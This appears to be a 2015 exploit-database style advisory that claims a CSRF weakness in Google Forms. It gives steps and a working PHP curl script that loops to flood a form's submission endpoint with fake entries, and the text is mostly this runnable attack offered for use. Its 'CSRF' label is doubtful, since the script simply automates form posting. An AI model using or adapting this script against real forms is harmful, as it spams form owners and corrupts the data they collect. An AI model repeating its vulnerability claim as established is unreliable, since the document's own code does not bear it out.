# Exploit Title: csrf google forms data flooding
# Date: 29-6-2015
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link: https://docs.google.com
# Tested on:windows or linux
========================================================
description:
google not set token in the forms
so attacker can send data flooding in forms
========================================================
Setps:
1- open any form in google forms
2- get inputs name and action you can use (burp suite)
3- edit my code php and put in it inputs name and action and number you want send data
4- run code in any server
==========================================================
poc:
<?php
$i =1;
function post_to_url($url, $data) {
$fields = '';
foreach($data as $key => $value) {
$fields .= $key . '=' . $value . '&';
}
rtrim($fields, '&');
ini_set('max_execution_time', 50000);
$post = curl_init();
curl_setopt($post, CURLOPT_URL, $url);
curl_setopt($post, CURLOPT_POST, count($data));
curl_setopt($post, CURLOPT_POSTFIELDS, $fields);
curl_setopt($post, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($post);
}
//number of data will be send 10
while ( $i <=10 ){
$data = array(
// inputs name //inputs value
"entry.1749181457" => "test alqnas eslam",
"entry.1360610555" => "01119032582",
"entry.660237368" => "info test",
"entry.319716724" => "alqnast@yahoo.com",
"entry.1363501645" => "19",
"draftResponse" =>"",
"pageHistory" =>"0",
"fbzx"=> "-2167671423753092324"
);
//action of form
post_to_url("https://docs.google.com/forms/action", $data);
$i++;
}
?>
======================================================================
the result after you run code
http://cdn.top4top.net/i_128f910c611.jpg
======================================================================
explane poc video in youtube
http://youtu.be/kHJi_8UNjxw
==============================================